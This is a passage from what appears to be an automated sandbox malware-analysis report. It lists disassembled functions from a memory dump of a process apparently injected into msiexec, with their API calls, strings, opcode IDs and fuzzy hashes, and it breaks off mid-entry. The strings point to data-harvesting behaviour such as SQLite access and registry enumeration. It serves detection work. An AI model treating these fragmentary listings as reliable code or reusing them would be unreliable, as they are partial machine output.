                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • strlen.MSVCRT ref: 00408DFA
                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                              • memset.MSVCRT ref: 00408E46
                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memsetstrlen
                                                              • String ID:
                                                              • API String ID: 2350177629-0
                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                              Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-1606337402
                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                              Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                              • memset.MSVCRT ref: 00408FD4
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                              • memset.MSVCRT ref: 00409042
                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 265355444-0
                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                              Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: 0cc151c1d5ae165ecab844de5cbdb339508ac62c1c3e4137b57658c1e94547ca
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: 0cc151c1d5ae165ecab844de5cbdb339508ac62c1c3e4137b57658c1e94547ca
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • free.MSVCRT ref: 00417544
                                                              • free.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 0b5abdb1f50a43c92236d4af65df84c42422b68fc3826eb4b9ca135c63c32c08
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • free.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: c9d5b5596c1dde7ff1a933dde4a77cb6db406228a744c63c7018c69b2ff3a246
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040FDD5
                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 1775345501-2769808009
                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                              Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastMessage_snwprintf
                                                              • String ID: Error$Error %d: %s
                                                              • API String ID: 313946961-1552265934
                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                              Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foreign key constraint failed$new$oid$old
                                                              • API String ID: 0-1953309616
                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                              Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                              Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 1265369119-0
                                                              • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0044A6EB
                                                              • memset.MSVCRT ref: 0044A6FB
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                              • free.MSVCRT ref: 0040E9D3
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: e793fa796aef0f07f419f152c53c6a77b8831374cf7a49b8641c5e4cd1935c75
                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                              • Opcode Fuzzy Hash: e793fa796aef0f07f419f152c53c6a77b8831374cf7a49b8641c5e4cd1935c75
                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                              Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • free.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: b0e2352a19f761283a872d87c69d2b5bb205fab1a5e12f8af4558502f69ded4d
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                              • String ID: \StringFileInfo\
                                                              • API String ID: 102104167-2245444037
                                                              • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                              • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                              Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
